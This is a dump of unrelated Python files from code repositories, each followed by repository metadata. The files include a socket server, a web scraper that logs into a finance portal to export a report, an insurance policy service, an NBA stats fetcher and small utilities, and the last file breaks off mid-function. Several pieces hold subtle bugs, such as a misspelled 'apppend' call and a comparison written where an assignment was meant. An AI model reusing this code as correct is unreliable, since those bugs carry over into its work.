"-m",
"dataclasses",
],
)
assert result.exit_code == 0
assert path3.exists()
assert filecmp.cmp(path3, path_base)
def test_missing_out():
result = runner.invoke(app, ["erdantic.examples.pydantic.Party"])
assert result.exit_code == 2
assert "Error" in result.stdout
assert "Missing option '--out' / '-o'." in result.stdout
def test_no_overwrite(tmp_path):
path = tmp_path / "diagram.png"
path.touch()
# With no-overwrite
result = runner.invoke(
app, ["erdantic.examples.pydantic.Quest", "-o", str(path), "--no-overwrite"]
)
assert result.exit_code == 1
assert path.stat().st_size == 0
# Overwrite
result = runner.invoke(app, ["erdantic.examples.pydantic.Quest", "-o", str(path)])
assert result.exit_code == 0
assert path.stat().st_size > 0
def test_dot(tmp_path):
result = runner.invoke(app, ["erdantic.examples.pydantic.Party", "-d"])
assert result.exit_code == 0
assert erd.to_dot(Party).strip() == result.stdout.strip()
path = tmp_path / "diagram.png"
result = runner.invoke(app, ["erdantic.examples.pydantic.Party", "-d", "-o", str(path)])
assert result.exit_code == 0
assert not path.exists() # -o is ignored and no file created
assert erd.to_dot(Party).strip() == result.stdout.strip()
# python -m erdantic
result = subprocess.run(
["python", "-m", "erdantic", "erdantic.examples.pydantic.Party", "-d"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
)
assert result.returncode == 0
assert not path.exists() # -o is ignored and no file created
assert erd.to_dot(Party).strip() == result.stdout.strip()
def test_help():
"""Test the CLI with --help flag."""
result = runner.invoke(app, ["--help"])
assert result.exit_code == 0
assert (
"Draw entity relationship diagrams (ERDs) for Python data model classes." in result.output
)
def test_version():
"""Test the CLI with --version flag."""
result = runner.invoke(app, ["--version"])
assert result.exit_code == 0
assert result.output.strip() == __version__
| drivendataorg/erdantic | tests/test_cli.py | test_cli.py | py | 6,182 | python | en | code | 205 | github-code | 36 | [
{
"api_name": "typer.testing.CliRunner",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "erdantic.cli.import_object_from_name",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "erdantic.examples.pydantic.Party",
"line_number": 20,
"usage_type": "name"
... |
10208120572 | import socket
import threading
from collections import deque
from concurrent.futures import ThreadPoolExecutor
from jsock.protocol import Protocol
from jsock.message import MessageHeader, Message
from jsock.errors import Errors
from jsock.client import Client
from jsock.config import Config
PORT = 1337
LISTEN_NUM = 50
AWAIT_LIMIT_NUM = 1000
# JacobSocks
#
# Features:
# Multithreading
# Simple
# Customisable
# Auto documentation your API
# Error handling
# Get message by callbacks and by (self made) await (await per socket)
# Expandable
# How to use:
# Show code
class InvalidProtocol(Exception):
pass
# TODO: make a lib for socket server in python
# TODO: Threw a exception
# TODO: make the config
# TODO: Make the chat server
# TODO: Upload to git and readme
# TODO: Finish the server
# TODO: + add on await failed (disconnected)
# TODO: + delete unuse messages
# TODO: do on code and on code socket function callbakcs (no necessary)
# TODO: + improve message read (first read code and len)
# TODO: make the chat_example docs automatic
# TODO: DEBUG
# TODO: config the server how I like (return format error, auto correct and so on, encryption or not)
# (make the class first)
# TODO: make tls
class ThreadedServer(object):
def __init__(self, config: Config, protocol: Protocol):
self._config = config
self._protocol = protocol
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock.bind((self._config.host, self._config.port))
self._input_lock = threading.Lock()
self._input_cv = threading.Condition(self._input_lock)
self._input_queue = deque()
self._input_callback = dict()
self._input_awaits = dict()
self._await_lock = threading.Lock()
self._await_cv = threading.Condition(self._await_lock)
self._on_disconnect_dict = dict()
self._on_connect = None
self._await_socks = dict()
# self.output_lock = threading.Lock()
# self.output_cv = threading.Condition(self.output_lock)
# self.output_queue = deque()
self._output_executor = ThreadPoolExecutor()
self._callbacks_executor = ThreadPoolExecutor()
def start(self):
threading.Thread(target=self._await_start).start()
def _await_start(self):
self._sock.listen(LISTEN_NUM)
threading.Thread(target=self._get_message_listener).start()
while True:
client = Client(*self._sock.accept())
# TODO: need "client.settimeout(120)" ?
if self._on_connect is not None:
self._callbacks_executor.submit(lambda: self._on_connect(client))
threading.Thread(target=self._on_listen_to_client, args=(client,)).start()
@staticmethod
def _send(sock, message):
sock.send(message.to_bytes())
def set_on_disconnect(self, sock, func):
if func is None:
del self._on_disconnect_dict[sock]
else:
self._on_disconnect_dict[sock] = func
def set_on_connector(self, func):
self._on_connect = func
def set_on_message(self, client, code, func):
if func is None:
del self._input_callback[(client, code)]
else:
print(func)
self._input_callback[(client, code)] = func
def send_message(self, client, message):
func = lambda: self._send(client.sock, message)
self._output_executor.submit(func)
# TODO: remove size limit and add dict of requests and not save every message
# TODO: timeout
def await_for_response(self, client, code, timeout=None, config=None):
with self._await_cv:
self._input_awaits[(client, code)] = None
if client not in self._await_socks:
self._await_socks[client] = []
self._await_socks[client].apppend(code)
while self._input_awaits[(client, code)] is None:
self._await_cv.wait()
return_value = self._input_awaits[(client, code)]
del self._input_awaits[(client, code)]
self._await_socks[client].remove(code)
if len(self._await_socks[client]) == 0:
del self._await_socks[client]
return return_value
# sorter
def _get_message_listener(self):
while True:
with self._input_cv:
while len(self._input_queue) == 0:
self._input_cv.wait()
while len(self._input_queue) != 0:
client, message = self._input_queue.pop()
# print(f"{client.sock} send: {message}")
# check if someone need the message of there is a callback
func = self._input_callback.get((client, message.code))
have_callback_code = func is not None
if have_callback_code:
self._callbacks_executor.submit(lambda: func(client, message))
else:
with self._await_cv:
if (client, message.code) in self._input_awaits:
self._input_awaits[(client, message.code)] = message
self._await_cv.notify_all()
def _add_to_queue(self, client, message):
with self._input_cv:
self._input_queue.append((client, message))
self._input_cv.notify_all()
# TODO: don't listen to non use code
def _on_listen_to_client(self, client):
while True:
try:
header_data = client.sock.recv(MessageHeader.get_size())
header = MessageHeader.format(header_data, self._config.code_enum_type)
if header.code == Errors.LOCAL_FORMAT_ERROR:
raise InvalidProtocol('Client disconnected')
data = client.sock.recv(header.get_size())
class_type = self._protocol.get_class(header)
if class_type is not None:
message = Message.format(header, class_type.from_json(data.decode()))
self._add_to_queue(client, message)
except InvalidProtocol as e: # TODO: to not kick
print(e)
client.sock.close()
func = self._on_disconnect_dict.get(client)
if func is not None:
self._callbacks_executor.submit(lambda: func(client))
return False
except OSError as e:
print(e)
client.sock.close()
func = self._on_disconnect_dict.get(client)
if func is not None:
self._callbacks_executor.submit(lambda: func(client))
return False
def _on_disconnect(self, client):
with self._await_cv:
if client in self._await_socks:
for code in self._await_socks[client]:
self._input_awaits[(client, code)] = Message.error()
del self._await_socks[client]
self._await_cv.notify_all()
client.sock.close()
func = self._on_disconnect_dict.get(client)
if func is not None:
self._callbacks_executor.submit(lambda: func(client))
| jacobggman/python_black_jack_server | jsock/server.py | server.py | py | 7,368 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "jsock.config.Config",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "jsock.protocol.Protocol",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "socket.socket",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "socket.AF_I... |
37989832631 | """
Steps to run:
python python policy_list_report_scraper.py
Program written in Python 3
Program Output:
1 file:
Exported_data.csv - csv file that contains the policy list report data
Program Description:
Progam first fetches the ASP login page paramters - __VIEWSTATE, __VIEWSTATEGENERATOR,
etc and then inputs these paramters and the login credentials to login
Then the program stores cookie info and uses it along with the new page parameters
to access the policy list reports page.
The code then mimics the "Go" POST request with the date parameters (hardcoded)
along with other parameters to get the report details.
The export POST request is then performed using the new set of form paramters.
The response contains the final exported csv contents which are written to a csv file:
Exported_data.csv
"""
import sys
import requests
from bs4 import BeautifulSoup
import json
# Main Function
def main():
# Login credentials
credentials = dict()
credentials['username'] = 'sample'
credentials['password'] = 'sample'
print("Getting login session parameters to login")
# Home page URL
home_page_url = 'https://secure.financepro.net/financepro/default.aspx?company=deltafinance'
# Storing the session info
session = requests.Session()
response = session.get(home_page_url)
# Parsing the response using Beautiful Soup
soup = BeautifulSoup(response.content, 'html.parser')
# Storing 3 ASP web-page specific form parameters to use to login
viewstate = soup.select('input[name=__VIEWSTATE]')[0]['value']
viewstate_generator = soup.select('input[name=__VIEWSTATEGENERATOR]')[0]['value']
event_validation = soup.select('input[name=__EVENTVALIDATION]')[0]['value']
login_form_parameters = dict()
login_form_parameters['__VIEWSTATE'] = viewstate
login_form_parameters['__VIEWSTATEGENERATOR'] = viewstate_generator
login_form_parameters['__EVENTVALIDATION'] = event_validation
login_form_parameters['tblForm$txtUserName'] = credentials['username']
login_form_parameters['tblForm$txtPassword'] = credentials['password']
login_form_parameters['tblForm$btnLogin'] = 'Log In'
login_form_parameters['tblForm$txtCompanyCode'] = 'deltafinance'
# Storing the cookies post login
response = session.post(home_page_url, login_form_parameters)
cookies = session.cookies.get_dict()
# Logging in
response = requests.post(home_page_url, login_form_parameters)
print("Logged in")
# Hardcoded Policy list data parameters
policy_list_date_params = dict()
policy_list_date_params['Date_Activated_Start_Date'] = '8/1/2009'
policy_list_date_params['Date_Activated_End_Date'] = '8/31/2019'
policy_list_date_params['Date_Change_Status_Start_Date'] = '8/1/2019'
policy_list_date_params['Date_Change_Status_End_Date'] = '8/31/2019'
print("\nPolicy List Dates that will be used:\n")
for key, val in policy_list_date_params.items():
print(key, ":", val)
print("\nAccessing Policy List Report Page")
reports_home_url = 'https://secure.financepro.net/financepro/Reports/ReportsHome.aspx'
policy_list_url = 'https://secure.financepro.net/financepro/Reports/PolicyList.aspx'
response = session.get(policy_list_url, cookies=cookies)
soup = BeautifulSoup(response.content, 'html.parser')
script_tags = soup.find_all("script")
# Retrieving the form paramters to send in the POST request
# 16th script tag contains json form paramters to send in the POST request
parameters = script_tags[15].text
# Retaining only the relevant json form parameters
start_ind = parameters.find("JSON.parse")
end_ind = parameters.find('")', start_ind)
parameters = parameters[start_ind + len("JSON.parse") + 2:end_ind]
parameters = parameters.replace("\\", "")
policy_list_info_params = dict()
# Getting the ASP accounts web page session paramters
viewstate = soup.select('input[name=__VIEWSTATE]')[0]['value']
viewstate_generator = soup.select('input[name=__VIEWSTATEGENERATOR]')[0]['value']
event_validation = soup.select('input[name=__EVENTVALIDATION]')[0]['value']
print("Parameters retrieved for making to Go POST request")
# Storing paramters to get account details page
policy_list_info_params['__VIEWSTATE'] = viewstate
policy_list_info_params['__VIEWSTATEGENERATOR'] = viewstate_generator
policy_list_info_params['__EVENTVALIDATION'] = event_validation
policy_list_info_params['PolicyDateRange'] = 'rbPolicyActivation'
# The data parameters need to manually changed
policy_list_info_params['DateActivatedFilter$txtStartDate'] = policy_list_date_params['Date_Activated_Start_Date']
policy_list_info_params['DateActivatedFilter$txtEndDate'] = policy_list_date_params['Date_Activated_End_Date']
policy_list_info_params['DateChangeStatusFilter$txtStartDate'] = policy_list_date_params['Date_Change_Status_Start_Date']
policy_list_info_params['DateChangeStatusFilter$txtEndDate'] = policy_list_date_params['Date_Change_Status_End_Date']
policy_list_info_params['ddlAgent$ctlAjaxDropDown$hidSelectedItem'] = parameters
policy_list_info_params['ddlGroupBy'] = 'AgentName, AccountNumber'
policy_list_info_params['btnGo'] = 'Go'
# Mimicing the POST request on clicking the "Go" button
response = requests.post(policy_list_url, policy_list_info_params, cookies=cookies)
soup = BeautifulSoup(response.content, 'html.parser')
print("Go button POST request sent")
viewstate = soup.select('input[name=__VIEWSTATE]')[0]['value']
viewstate_generator = soup.select('input[name=__VIEWSTATEGENERATOR]')[0]['value']
event_validation = soup.select('input[name=__EVENTVALIDATION]')[0]['value']
policy_list_info_params['__VIEWSTATE'] = viewstate
policy_list_info_params['__VIEWSTATEGENERATOR'] = viewstate_generator
policy_list_info_params['__EVENTVALIDATION'] = event_validation
policy_list_info_params['__EVENTARGUMENT'] = 'EXPORT'
policy_list_info_params['__EVENTTARGET'] = 'Report'
policy_list_info_params.pop('btnGo', None)
print("Parameters retrieved for export csv POST request")
# HTTP POST request to export CSV data
response = requests.post(policy_list_url, policy_list_info_params, cookies=cookies)
soup = BeautifulSoup(response.content, 'html.parser')
# Response contains the exported CSV file
final_csv_output_string = str(soup).strip()
print("\nCSV File contents exported:\n")
print(final_csv_output_string)
final_csv_output_string += "\n"
# Writing the CSV contents to a CSV file
csv_file_name = "Exported_data.csv"
with open(csv_file_name, "w") as csv_file_handler:
csv_file_handler.write(final_csv_output_string)
print("\nCSV contents exported to file:")
print(csv_file_name)
print("\nLogging off")
# Log off page called with cookie info
log_off_url = 'https://secure.financepro.net/financepro/logoff.aspx'
response = requests.get(log_off_url, cookies=cookies)
final_url = 'https://www.deltafinanceoftexas.com/'
response = requests.get(final_url)
# Entry point of code
if __name__ == "__main__":
main()
| tebbythomas/Freelance_Projects | Web_Data_Extraction_Projects/J11_Finance_Pro_Policy_List_Report_Generator/Policy_List_Report/policy_list_report_scraper.py | policy_list_report_scraper.py | py | 7,187 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "requests.Session",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
... |
26290834166 | """Tests for common_utils.py."""
import common_utils
import pytest
class TestCommonUtils:
def testGetFilePathShouldRaiseError(self):
common_utils.input = lambda _: 'foo'
with pytest.raises(FileNotFoundError):
common_utils.get_file_path()
common_utils.input = input
def testGetFilePathShouldNotRaiseError(self, tmp_path):
directory = tmp_path / 'audio'
directory.mkdir()
file_path = directory / 'test.wav'
file_path.write_text('')
common_utils.input = lambda _: file_path
try:
common_utils.get_file_path()
assert True
except FileNotFoundError as err:
assert False, err
finally:
common_utils.input = input
| thompsond/PyAVMisc | com/AVMisc/common_utils_test.py | common_utils_test.py | py | 687 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "common_utils.input",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "pytest.raises",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "common_utils.get_file_path",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "common... |
477236470 | import io, os
from .comment_parser import CommentParser
from .create_parser import CreateParser
from .insert_parser import InsertParser
class Reader:
def __init__(self):
self._tables = {}
self._rows = {}
self._global_errors = []
self._global_warnings = []
self._parsing_errors = []
self._parsing_warnings = []
self._schema_errors = []
self._schema_warnings = []
self._matched = False
@property
def matched(self):
""" Public getter. Returns whether or not the content was successfully parsed
:returns: Whether or not parsing was successful
:rtype: bool
"""
return self._matched
@property
def parsing_errors(self):
""" Public getter. Returns a list of parsing errors
:returns: A list of parsing errors
:rtype: list
"""
return [] if self._parsing_errors is None else self._parsing_errors
@property
def parsing_warnings(self):
""" Public getter. Returns a list of parsing/table warnings
:returns: A list of parsing/table warnings
:rtype: list
"""
return [] if self._parsing_warnings is None else self._parsing_warnings
@property
def schema_errors(self):
""" Public getter. Returns a list of schema errors
:returns: A list of schema errors
:rtype: list
"""
return [] if self._schema_errors is None else self._schema_errors
@property
def schema_warnings(self):
""" Public getter. Returns a list of schema warnings
:returns: A list of schema warnings
:rtype: list
"""
return [] if self._schema_warnings is None else self._schema_warnings
@property
def global_errors(self):
""" Public getter. Returns a list of schema errors
:returns: A list of schema errors
:rtype: list
"""
return [] if self._global_errors is None else self._global_errors
@property
def global_warnings(self):
""" Public getter. Returns a list of schema warnings
:returns: A list of schema warnings
:rtype: list
"""
return [] if self._global_warnings is None else self._global_warnings
@property
def tables(self):
""" Public getter. Returns a list of table definitions
:returns: A list of table definitions
:rtype: dict[mygrations.formats.mysql.definitions.table]
"""
return self._tables
@property
def rows(self):
""" Public getter. Returns a dictionary containing a lists of rows by table name
:returns: A dictionary containing list of rows by table name
:rtype: {table_name: [mygrations.formats.mysql.defintions.row]}
"""
return self._rows
""" Helper that returns info about the current filename (if present) for error messages
:returns: Part of an error message
:rtype: string
"""
def _filename_notice(self):
if self.filename:
return ' in file %s' % self.filename
return ''
""" Reads the file, if necessary
Reader is a bit more flexible than the other parsers. It can accept a filename,
file-like object, or a string. This method handles that flexibility, taking
the input from the _parse method and extracting the actual contents no matter
what was passed in.
:returns: The data to parse
:rtype: string
"""
def _unpack(self, filename):
# be flexible about what we accept
# file pointer
self.filename = ''
if isinstance(filename, io.IOBase):
contents = filename.read()
# and an actual string
elif isinstance(filename, str):
# which could be a filename
if os.path.isfile(filename):
self.filename = filename
fp = open(filename, 'r')
contents = fp.read()
fp.close()
else:
contents = filename
else:
raise ValueError(
"Unknown type for filename: must be an ascii string, a filename, file pointer, or StringIO"
)
return contents
""" Main parsing loop: attempts to find create, insert, and comments in the SQL string
"""
def parse(self, filename):
data = self._unpack(filename)
# okay then! This is our main parsing loop.
c = 0
while data:
c += 1
if c > 10000:
raise ValueError("Exceeded max parse depth")
# never hurts
data = data.strip()
# now we are looking for one of three things:
# comment, create, insert
if data[:2] == '--' or data[:2] == '/*' or data[0] == '#':
parser = CommentParser()
data = parser.parse(data)
elif data[:6].lower() == 'create':
parser = CreateParser()
data = parser.parse(data)
self._tables[parser.name] = parser
elif data[:6].lower() == 'insert':
parser = InsertParser()
data = parser.parse(data)
if not parser.table in self._rows:
self._rows[parser.table] = []
self._rows[parser.table].append(parser)
else:
if self._global_errors is None:
self._global_errors = []
self._global_errors.append("Unrecognized MySQL command: %s%s" % (data, self._filename_notice()))
return data
self._matched = True
return data
| cmancone/mygrations | mygrations/formats/mysql/file_reader/reader.py | reader.py | py | 5,702 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "io.IOBase",
"line_number": 128,
"usage_type": "attribute"
},
{
"api_name": "os.path.isfile",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 135,
"usage_type": "attribute"
},
{
"api_name": "comment_parser.CommentP... |
12234497572 | import datetime
from typing import List
from sqlalchemy.orm import make_transient
from data_access.entities.person import Person
from data_access.entities.policy import Policy
from data_access.entities.policy_offer_template import PolicyOfferTemplate
from data_access.entities.policy_risk import PolicyRisk
from data_access.entities.vehicle import Vehicle
from data_access.repositories.person_repository import PersonRepository
from data_access.repositories.policy_offer_template_repository import PolicyOfferTemplateRepository
from data_access.repositories.policy_repository import PolicyRepository
from data_access.repositories.policy_risk_repository import PolicyRiskRepository
from data_access.repositories.vehicle_repository import VehicleRepository
from services.broker_service import BrokerService
from services.calculation_service import CalculationService
from services.errors import Errors
from services.models.offer_template_creation_model import OfferTemplateCreationModel
from services.models.service_message import ServiceMessage
from services.models.offer_creation_model import OfferCreationModel
class PolicyService:
__person_repository: PersonRepository
__policy_repository: PolicyRepository
__policy_offer_template_repository: PolicyOfferTemplateRepository
__policy_risk_repository: PolicyRiskRepository
__vehicle_repository: VehicleRepository
__broker_service: BrokerService
__calculation_service: CalculationService
def __init__(
self,
policy_repository: PolicyRepository,
broker_service: BrokerService,
policy_offer_template_repository: PolicyOfferTemplateRepository,
vehicle_repository: VehicleRepository,
calculation_service: CalculationService,
policy_risk_repository: PolicyRiskRepository,
person_repository: PersonRepository
):
self.__policy_repository = policy_repository
self.__broker_service = broker_service
self.__policy_offer_template_repository = policy_offer_template_repository
self.__vehicle_repository = vehicle_repository
self.__calculation_service = calculation_service
self.__policy_risk_repository = policy_risk_repository
self.__person_repository = person_repository
def get_by_broker(self, api_key: str, is_offer: bool = False) -> [Policy]:
broker = self.__broker_service.get_by_api_key(api_key)
if broker is None:
return []
return self.__policy_repository.get_by_broker(broker.Id, is_offer)
def get_by_id(self, policy_id: int) -> [Policy]:
return self.__policy_repository.get_by_id(policy_id)
def get_by_vehicle(self, vehicle_id: int):
return self.__policy_repository.get_by_vehicle(vehicle_id)
def get_by_person(self, person_id: int):
return self.__policy_repository.get_by_person(person_id)
def get_by_insurer(self, insurer_id: int, is_summary: bool):
return self.__policy_repository.get_premium_sum_by_insurer(insurer_id)\
if is_summary\
else self.__policy_repository.get_by_insurer(insurer_id)
def create_offer_template(self, offer_template_model: OfferTemplateCreationModel) -> int:
policy_offer_template = PolicyOfferTemplate()
policy_offer_template.Id = self.__policy_offer_template_repository.create_id()
policy_offer_template.Name = offer_template_model.name
policy_offer_template.InsurerId = offer_template_model.insurerId
policy_offer_template.QuotationAlgorithm = offer_template_model.quotationAlgorithm
policy_offer_template.ValidFrom = offer_template_model.validFrom
policy_offer_template.ValidTo = offer_template_model.validTo
self.__policy_offer_template_repository.session().add(policy_offer_template)
self.__policy_offer_template_repository.session().commit()
return policy_offer_template.Id
def create_offer_from_template(self, template_id: int, offer_model: OfferCreationModel, broker_id: int) -> ServiceMessage:
service_message = ServiceMessage()
template = self.__policy_offer_template_repository.get_by_id(template_id)
if template is None:
service_message.errors.append(Errors.NO_POLICY_OFFER_TEMPLATE)
return service_message
vehicle = self.__vehicle_repository.get_by_vin(offer_model.vehicle.vin)
if vehicle is None:
vehicle = Vehicle()
vehicle.Id = self.__vehicle_repository.create_id()
vehicle.Make = offer_model.vehicle.make
vehicle.Model = offer_model.vehicle.model
vehicle.RegistrationNumber = offer_model.vehicle.registrationNumber
vehicle.Vin = offer_model.vehicle.vin
vehicle.ProductionYear = offer_model.vehicle.productionYear
vehicle.RegistrationDate = offer_model.vehicle.registrationDate
vehicle.OwnerCount = offer_model.vehicle.ownerCount
self.__vehicle_repository.session().add(vehicle)
self.__vehicle_repository.session().commit()
person = self.__person_repository.get_by_pesel(offer_model.person.pesel)
if person is None:
person = Person()
person.Id = self.__person_repository.create_id()
person.Name = offer_model.person.name
person.LastName = offer_model.person.lastName
person.BirthDate = offer_model.person.birthDate
person.Pesel = offer_model.person.pesel
person.Email = offer_model.person.email
person.PhoneNumber = offer_model.person.phoneNumber
self.__person_repository.session().add(person)
self.__person_repository.session().commit()
offer = Policy()
offer.Id = self.__policy_repository.create_id()
offer.VehicleId = vehicle.Id
offer.InsurerId = template.InsurerId
offer.BrokerId = broker_id
offer.PersonId = person.Id
offer.CreationDate = datetime.date.today()
offer.IsOffer = True
offer.Version = 1
self.__policy_repository.session().add(offer)
self.__policy_repository.session().commit()
risks = self.calculate_risks(vehicle, template)
for index, risk in enumerate(risks):
risks[index].PolicyId = offer.Id
risks[index].Id = self.__policy_risk_repository.create_id()
self.__policy_risk_repository.session().add(risks[index])
self.__policy_risk_repository.session().commit()
service_message.content = offer.Id
return service_message
def issue_policy(self, offer_id: int) -> ServiceMessage:
service_message = ServiceMessage()
offer = self.__policy_repository.get_by_id(offer_id)
if not offer.IsOffer:
service_message.errors.append(Errors.NO_OFFER_WITH_ID)
else:
risks = offer.PolicyRisks
make_transient(offer)
policy = offer
policy.OfferId = offer.Id
policy.Id = self.__policy_repository.create_id()
policy.IsOffer = False
self.__policy_repository.session().add(policy)
self.__policy_repository.session().commit()
for index, risk in enumerate(risks):
new_risk = PolicyRisk()
new_risk.Id = self.__policy_risk_repository.create_id()
new_risk.PolicyId = policy.Id
new_risk.CurrencyId = risk.CurrencyId
new_risk.RiskId = risk.RiskId
new_risk.CreationDate = datetime.date.today()
new_risk.StartDate = risk.StartDate
new_risk.EndDate = risk.EndDate
new_risk.Premium = risk.Premium
self.__policy_risk_repository.session().add(new_risk)
self.__policy_risk_repository.session().commit()
service_message.content = offer.Id
return service_message
def calculate_risks(self, vehicle: Vehicle, policy_offer_template: PolicyOfferTemplate) -> list[PolicyRisk]:
return self.__calculation_service.calculate(vehicle, policy_offer_template)
| bastyje/policyapp | python/src/services/policy_service.py | policy_service.py | py | 8,189 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "data_access.repositories.person_repository.PersonRepository",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "data_access.repositories.policy_repository.PolicyRepository",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "data_access.repositories.... |
6296104681 | import requests
import urllib.parse
from models import PlayByPlay
from constants import headers
from db_utils import insert_many
class PlayByPlayRequester:
url = 'https://stats.nba.com/stats/playbyplayv2'
def __init__(self, settings):
self.settings = settings
self.settings.db.bind([PlayByPlay])
def create_ddl(self):
"""
Initialize the table schema.
"""
self.settings.db.create_tables([PlayByPlay], safe=True)
def fetch_game(self, game_id):
"""
Build GET REST request to the NBA for a game, iterate over
the results and return them.
"""
params = self.build_params(game_id)
# Encode without safe '+', apparently the NBA likes unsafe url params.
params_str = urllib.parse.urlencode(params, safe=':+')
response = requests.get(url=self.url, headers=headers, params=params_str).json()
# pulling just the data we want
player_info = response['resultSets'][0]['rowSet']
rows = []
# looping over data to return.
for row in player_info:
new_row = {
'game_id': row[0],
'event_num': row[1],
'event_msg_type': row[2],
'event_msg_action_type': row[3],
'period': row[4],
'wc_time': row[5],
'home_description': row[7],
'neutral_description': row[8],
'visitor_description': row[9],
'score': row[10],
'score_margin': row[11],
'player1_id': self.get_null_id(row[13]),
'player1_team_id': self.get_null_id(row[15]),
'player2_id': self.get_null_id(row[20]),
'player2_team_id': self.get_null_id(row[22]),
'player3_id': self.get_null_id(row[27]),
'player3_team_id': self.get_null_id(row[29])
}
rows.append(new_row)
return rows
def insert_batch(self, rows, player_id_set):
"""
Batch insertion of records.
"""
# It looks like the NBA API returns some bad data that
# doesn't conform to their advertized schema:
# (team_id in the player_id spot).
# We can maybe get away with ignoring it.
# Check if id is in player_id cache.
# We need to preserve the row in general becuase it could still have
# good data for the correctly returned players.
for row in rows:
for key in ['player1_id', 'player2_id', 'player3_id']:
if row[key] is not None and row[key] not in player_id_set:
row[key] is None
insert_many(self.settings, PlayByPlay, rows)
def build_params(self, game_id):
"""
Create required parameters dict for the request.
"""
return {
'EndPeriod': 6,
'GameId': game_id,
'StartPeriod': 1
}
def get_null_id(self, id):
"""
This endpoint will return a player's id or player's team id as 0
sometimes. We will store 'null', as 0 breaks the foriegn key
constraint.
"""
if id == 0:
return None
return id
| Promise-Igbo/nba-sql | stats/play_by_play.py | play_by_play.py | py | 3,273 | python | en | code | null | github-code | 36 | [
{
"api_name": "models.PlayByPlay",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "models.PlayByPlay",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "urllib.parse.parse.urlencode",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "urll... |
21704376256 | #
# @lc app=leetcode.cn id=40 lang=python3
#
# [40] 组合总和 II
#
from typing import List
# @lc code=start
class Solution:
def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:
ans = []
current = []
def dfs(i, target):
if target == 0:
ans.append(current[:])
return
if i >= len(candidates):
return
next_target = target - candidates[i]
if next_target >= 0:
current.append(candidates[i])
dfs(i + 1, next_target)
current.pop()
j = i + 1
while j < len(candidates) and candidates[i] == candidates[j]:
j += 1
dfs(j, target)
candidates.sort()
dfs(0, target)
return ans
# @lc code=end
Solution().combinationSum2([2,5,2,1,2], 5) | LinkTsang/.leetcode | solutions/40.组合总和-ii.py | 40.组合总和-ii.py | py | 780 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 11,
"usage_type": "name"
}
] |
69812436265 | import numpy as np
import cv2
from PIL import Image
#В этом скрипте делаем маску
#С помощью манипуляций с opencv создаем два файла
#первый - с контрастными крышами, второй - с выделенными дорогами
#затем - используя второй файл, убираем дороги с первого
image = "ZRYNEEUSVQ213QTY.png"
input = cv2.imread(image)
_, th = cv2.threshold(input, 130, 160, cv2.THRESH_TOZERO)
cv2.imwrite("th.png", th)
image = "th.png"
img = cv2.imread(image)
lower = np.array([0, 1, 1])
upper = np.array([0, 255, 255])
mask = cv2.inRange(img, lower, upper)
roads = cv2.bitwise_and(img, img, mask=mask)
height = int(np.size(img, 0))
width = int(np.size(img, 1))
for h in range(1, 500):
for w in range(1, 500):
color = str(roads[w, h])
if color != "[0, 145, 153]":
pass
else:
roads[h, w] = [0, 0, 255]
cv2.imwrite("roads.png", roads)
mask = Image.open("roads.png")
mask1 = Image.open("th.png")
for i in range (1, 6528):
for j in range (1, 7733):
if mask1.getpixel((i,j))[0] != 0 or mask1.getpixel((i,j))[1] != 0 or \
mask1.getpixel((i,j))[2] != 0:
mask1.putpixel((i, j), (255, 255, 255))
if (mask.getpixel((i, j))[0] != 0) or (mask.getpixel((i, j))[1] != 0) or (mask.getpixel((i, j))[2] != 0):
mask1.putpixel((i, j), (0, 0, 0))
mask1.save("dengi3.jpg", "JPEG") | kekartem/BuildingDefine | RunFirst.py | RunFirst.py | py | 1,512 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "cv2.imread",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "cv2.threshold",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cv2.THRESH_TOZERO",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "cv2.imwrite",
"li... |
18913603323 | from collections import defaultdict
class Solution:
def valid_tree(self, n: int, edges: list[list[int]]) -> bool:
seen: set[int] = set()
children: dict[int, list[int]] = defaultdict(list)
for x, y in edges:
children[x].append(y)
children[y].append(x)
def dfs(node: int, prev: int) -> bool:
if node in seen:
return False
seen.add(node)
for child in children[node]:
if child == prev:
continue
if not dfs(child, node):
return False
return True
return dfs(0, 0) and len(seen) == n
| lancelote/leetcode | src/graph_valid_tree.py | graph_valid_tree.py | py | 689 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "collections.defaultdict",
"line_number": 7,
"usage_type": "call"
}
] |
11571428709 | from django.utils.module_loading import import_string
from django.urls import (RegexURLResolver, RegexURLPattern)
from CRM import settings
from collections import OrderedDict
def recursion_urls(pre_namespace, pre_url, urlpatterns, url_ordered_dict):
# None, '/', urlpatterns, url_ordered_dict
'''
第一次递归:
url(r'^', include('web.urls')),
url(r'^rbac/', include('rbac.urls', namespace='rbac')),
第二次递归:
'rbac','/^rbac/', rbac.urls文件下的urlpatterns变量, url_ordered_dict
'''
for url in urlpatterns:
